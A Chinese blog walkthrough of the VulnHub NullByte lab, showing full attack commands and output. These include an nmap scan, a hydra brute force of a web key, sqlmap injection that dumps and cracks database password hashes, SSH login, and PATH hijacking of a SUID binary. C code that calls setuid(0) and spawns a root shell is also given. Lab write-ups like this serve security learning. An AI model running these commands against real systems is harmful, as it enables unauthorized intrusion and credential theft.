vulnhub(4):NullByte(hydra爆破、sql注入、path劫持提权、提权小tps)

已于 2024-09-11 12:29:06 修改
阅读量690 收藏 9
点赞数 22
文章标签: sql 安全 网络安全 linux web安全
于 2024-09-11 11:33:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142135361
版权

端口

nmap主机发现
nmap -sn 192.168.236.0/24
​
Nmap scan report for 192.168.236.177
Host is up (0.00020s latency).
​
177是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.236.177 --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT        STATE       SERVICE
80/tcp      open        http
111/tcp     open        rpcbind   
777/tcp     open        ssh    
​
​
发现开放4个端口
nmap -sT -sC -sV -O -p22,80, -oA nmap/scan 192.168.236.177详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          41363/tcp6  status
|   100024  1          50826/tcp   status
|   100024  1          53666/udp   status
|_  100024  1          57231/udp6  status
777/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 163013d9d55536e81bb7d9ba552fd744 (DSA)
|   2048 29aa7d2e608ba6a1c2bd7cc8bd3cf4f2 (RSA)
|   256 6006e3648f8a6fa7745a8b3fe1249396 (ECDSA)
|_  256 bcf7448d796a194876a3e24492dc13a2 (ED25519)

立足点

查看网页,除了主页main.gif什么都没有,准备目录爆破

gobuster dir -u http://192.168.236.177/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html --add-slash
​
/.html/               (Status: 403) [Size: 296]
/.php/                (Status: 403) [Size: 295]
/icons/               (Status: 403) [Size: 296]
/uploads/             (Status: 200) [Size: 113]
/javascript/          (Status: 403) [Size: 301]
/phpmyadmin/          (Status: 200) [Size: 9123]
/.php/                (Status: 403) [Size: 295]
/.html/               (Status: 403) [Size: 296]
​
看下uploads和phpmyadmin,phpmyadmin是登录管理mysql页面,uploads只有个字符串Directory listing not allowed here.
​
uploads我也是用gobuster扫过,没什么敏感内容,phpmyadmin我使用sqlmap扫过没有sql注入

基本上信息收集完了,除了刚才看到的主页的main.gif

exiftools查看一下图片信息
​
ExifTool Version Number         : 12.49
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:02 00:39:30+08:00
File Access Date/Time           : 2024:09:10 20:55:26+08:00
File Inode Change Date/Time     : 2024:09:10 20:55:14+08:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071
​
发现comment下的kzMb5nVYJw敏感字符串
这个字符串登录ssh,phpmyadmin和网页目录都试一试,看看有没有新的内容
​
发现存在http://192.168.236.177/kzMb5nVYJw网页目录,下图是网页的全部内容

输入几个key,会出现invalid key,不知道要输入什么,拿hydra扫一下,使用rockyou字典

hydra -l none -P /usr/share/wordlists/rockyou.txt 192.168.236.177 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key"
解析:
    -l表示要爆破的用户名
    
    -P表示要爆破的密码字典
    
    http-post-form 表示使用post爆破
        "/kzMb5nVYJw/index.php:key=^PASS^:invalid key":
            1.路径信息
            2.post数据以及^PASS^占位符
            3.返回的失败信息
            
最后爆出了个elite可以成功跳到下一个页面

又是一个输入框,除了爆破就是sql注入,这次先试一试sql注入,爆破查一些用户名没太大渗透作用

sqlmap -u http://192.168.236.177/kzMb5nVYJw/420search.php?usrtosearch=1 -dbs -batch
​
发现存在注入,获取到mysql一些信息:
[21:15:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[21:15:35] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
​
使用sqlmap查一查库里的内容:
命令解析:
    -D mysql --tables:选定mysql库,查看其表
    -D mysql -T <thetable> --columns:选定mysql库,thetable表,查询表中有哪些字段
    -D mysql -T <thetable> --dump:选定mysql库,thetable表,显示出thetable表所有内容
大致按以上这些思路去查
​
sqlmap -u http://192.168.236.177/kzMb5nVYJw/420search.php?usrtosearch=1 -D mysql -T user -C User,Password --dump --batch
显示mysql库user表的User,Password字段发现如下信息,可以发现sqlmap自动破解了hash:
+------------------+-------------------------------------------------------+
| User             | Password                                              |
+------------------+-------------------------------------------------------+
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC             |
| phpmyadmin       | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
+------------------+-------------------------------------------------------+
这些信息是phpmyadmin登录凭据,不能使用ssh登录,既然我们有了sql注入能查询数据库所有内容,我们也不需要phpmyadmin的登录凭据了。
接着查询其他数据库的其他表
sqlmap -u http://192.168.236.177/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T users --dump-all
​
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+
​
这个是个敏感信息,我们那他做一下破解
可以去网站https://hashes.com/en/decrypt/hash做破解,也可以使用john破解,在这里我们使用工具john
​
base64解密:
c6d6bd7ebf806f43c76acc3681703b81
​
md5破解:
echo c6d6bd7ebf806f43c76acc3681703b81 > md5_hash
john --format=raw-md5 md5_hash 
​
成功破解:omega
​
使用户名ramses登录ssh
ssh ramses@192.168.236.177 -p 777

提权

信息枚举

cat /etc/passwd:查看用户
sudo -l :提示无权限
cat /etc/crontab:没有可利用的计划任务
find / -perm -u=s -type f 2>/dev/null:查看具有s位的程序
​
信息如下:
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
​
​
看到有s位的程序:/var/www/backup 中运行名为 procwatch
存放在/var/www/backup目录下,看看有没有什么配置错误
​
运行./procwatch

./procwatch运行界面和ps查看进程的运行界面一样,推断./procwatch调用了ps这个命令

./procwatch调用ps会在环境变量中按顺序寻找,如果我们将它寻找ps的过程引导成我们的以ps为名恶意文件,那么我们就能够顺利提权
​
export PATH=.:$PATH
方法1:echo "/bin/sh" > ps
方法2:ln -s /bin/sh ps(创建一个/bin/sh的快捷方式)
方法3:编译c语言未ps可执行文件

tips

将/bin/sh改为/bin/bash发现提权不成功,新起的shell仍然是ramses用户,如下:
bash-4.3$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
​
这是因为suid调用bash时,会判断ruid和euid是否相同
ruid:真实用户ID表示发起该进程的用户。
euid:称为有效用户 ID,它表示系统用来确定进程权限的用户身份。
​
如果不相同,他将以ruid发起该进程的用户也就是ramses权限执行
​
解决方案:在调用/bin/bash前使用setuid(0)设置调用ruid为root用户
如下是调用setuid(0)和未调用的对比实验,将他们编译为ps,运行./procwatch

int main()
{
        int euid,ruid;
        ruid = getuid();
        euid = geteuid();
        printf("ruid=%d\neuid=%d",ruid,euid);
        setuid(0);
        ruid = getuid();
        printf("new_ruid=%d\n",ruid);
        system("/bin/bash");
​
        return 0;
}
​
​
ruid=1002
euid=0new_ruid=0
root@NullByte:/var/www/backup# id
uid=0(root) gid=1002(ramses) groups=1002(ramses)
#include <stdio.h>
int main()
{
        int euid,ruid;
        ruid = getuid();
        euid = geteuid();
        printf("ruid=%d\neuid=%d",ruid,euid);
        printf("ruid=%d\n",ruid);
        system("/bin/bash");
​
        return 0;
}
​
ruid=1002
euid=0ruid=1002
bash-4.3$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
​
这里可以看到euid=0ruid=1002不相同,按照ruid调用者身份执行

/bin/bash在调用的时候,会判断当前bash进程的ruid和suid,若不同则降权
而/bin/sh是原始轻量级的shell不会像/bin/bash主动降权

anddddoooo
关注
  • 22
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
vulnhub靶场:NULLBYTE
weixin_46497491的博客
03-25 614
vulnhubNULLBYTE、nmap、SQL注入写shell、suid提权
01_渗透靶场NullByte:namp使用,多姿势SQL注入提权
Hack word
03-23 1143
首先使用nmap进行扫描,发现NullByte靶机地址为192.168.20.14,然后对齐各种端口进行检测,使用默认脚本检测,然后进行目录爆破,根据爆破的结果去访问web页,查看网页源码查看网页上图片的信息,将这个信息进行解析查看文件的具体内容,发现字符串尝试当作密码/路径等一切可以想到的进行访问,跳转到新的界面测试是否存在SQL注入,但是在新的页面当中所存在的是"双引号报错,根据SQL注入的多种姿势进行操作,最终拿到phpmyadmin页面的登录账户和密码,然后进行远程ssh连接,进入后首先查看当前用户
实战渗透测试-hydra 爆破 CVE-2010-3847 提权
网络安全领域优质创作者
11-05 510
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.35 -oX10.11.1.35.xml xsltproc-o10.11.1.35.html10.11.1.35.xml hydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.11.1.35ssh密码爆破 https://10.11.1.35/section.php?pa...
vulnhub靶机推荐:dc9(本地文件包含,sql注入,文件覆盖提权
anddddoooo的博客
09-07 1018
file=../../../../../../../etc/passwd,发现本地文件包含lfi漏洞,能读取服务器敏感文件/etc/passwd。首先要查看knock的配置文件,寻找服务器对knock的配置,其配置存放在/etc/knockd下,通过lfi漏洞查看。能够以root权限调用/opt/devstuff/dist/test/test文件,允许一下。
vulnhub - DC 9 (考点:SQL注入&LFI&端口敲门&ssh暴力解密&捉迷藏&python基础&linux修改passwd sudoers提权
冬萍子癸水
05-29 860
https://www.vulnhub.com/entry/dc-9,412/ nat网络 arp-scan -l扫出比平常多出的ip就是靶机了 nmap 80是进web搜集信息,22是要想到ssh登录拿shell,但是这里要看仔细,22没有开,是filter状态。这里为后面的端口敲门埋下了伏笔。以后遇到这种也要往敲门方向想 PORT STATE SERVICE VERSION 22/t...
msf hydra 弱口令爆破SQL service(1433)
Jhd_02的博客
08-31 1257
弱口令爆破
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)
qq_45722813的博客
12-06 2531
Vulnhub靶场渗透测试DC-4(hydra爆破密码的使用) 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 将下载好的靶机导入到VMware中,修改其网络模式为NAT模式,然后开启靶机 在kali攻击机进行主机发现,获取靶机的IP地址,使用工具arp-scan或者nmap都可以 注意: 如果发现不了靶机IP,则需要修改靶机的网络设置,参考文章https://blog.csdn.net/qq_45722813/article/details/1213246
leetcode 1811 寻找面试候选人(postgresql)
weixin_51696882的博客
09-11 688
编写 SQL 语句来返回 所有面试候选人 的姓名 name 和邮件 mail 。当用户满足以下两个要求中的 任意一条 ,其成为 面试候选人 : 该用户在 连续三场及更多 比赛中赢得 任意 奖牌。 该用户在 三场及更多不同的 比赛中赢得 金牌(这些比赛可以不是连续的) 可以以 任何顺序 返回结果。
被低估的SQL
weixin_61431494的博客
09-03 1652
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQLServer分组查询
NaZiMeKiY的博客
09-08 411
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having关键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1404
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
Python一些可能用的到的函数系列132 ORM-sqlalchemy连clickhouse
yukai08008的博客
09-06 936
继续ORM的转换。
leetcode 1651 Hopper公司查询3(postgresql)
weixin_51696882的博客
09-06 873
编写SQL查询以计算从 2020年1月至3月至2020年10月至12月 的每三个月窗口的 average_ride_distance 和 average_ride_duration 。将 average_ride_distance 和 average_ride_duration 四舍五入至 小数点后两位 。 通过将三个月的总 ride_distance 相加并除以 3 来计算 average_ride_distance 。average_ride_duration 的计算方法与此类似。 返回按 month
Spring AOP
最新发布
2301_79288225的博客
09-11 693
什么是⾯向特定⽅法编程呢?⽐如上个章节学习的"登录校验", 就是⼀类特定问题. 登录校验拦截器, 就是对"登录校验"这类问题的统⼀处理. 所以, 拦截器也是AOP的⼀种应⽤. AOP是⼀种思想, 拦截器是AOP思想的⼀种实现. Spring框架实现了这种思想, 提供了拦截器技术的相关接⼝.当我们在⼀个项⽬中, 定义了多个切⾯类时, 并且这些切⾯类的多个切⼊点都匹配到了同⼀个⽬标⽅法. 当⽬标⽅法运⾏的时候, 这些切⾯类中的通知⽅法都会执⾏, 那么这⼏个通知⽅法的执⾏顺序是什么样的呢?
【PostgreSQL教程】PostgreSQL 高级篇之 TRANSACTION(事务)
No8g攻城狮的博客
09-05 502
TRANSACTION(事务)是数据库管理系统执行过程中的一个逻辑单位,由一个有限的数据库操作序列构成。数据库事务通常包含了一个序列的对数据库的读/写操作。
高基数 GroupBy 在 SLS SQL 中的查询加速
阿里巴巴云原生的博客
09-05 1052
SLS SQL 也持续关注这一点,并对此进行了相应的性能优化,本文即旨在向用户介绍 SLS 中的实现原理、查询加速手段以及适用场景。
shell提权与密码爆破
05-30
这两个话题都是与安全相关的话题,需要谨慎处理。 关于shell提权,它是指利用漏洞或者其他手段,将一个普通用户提升为系统管理员或root用户,从而获得更高的权限进行操作。这个过程需要具备一定的技术知识和经验,同时也需要合法授权才能进行。一般来说,系统管理员应该定期检查系统漏洞,并及时修复,以避免被黑客攻击。 关于密码爆破,它是指通过尝试不同的密码,以找到正确密码的过程。这个过程需要使用一些密码破解工具,如John the Ripper、Hydra等,同时也需要一定的时间和计算资源。一般来说,密码应该设置足够复杂,包含大小写字母、数字和符号,并且定期更换。此外,可以使用多因素认证等安全措施,以提高系统安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值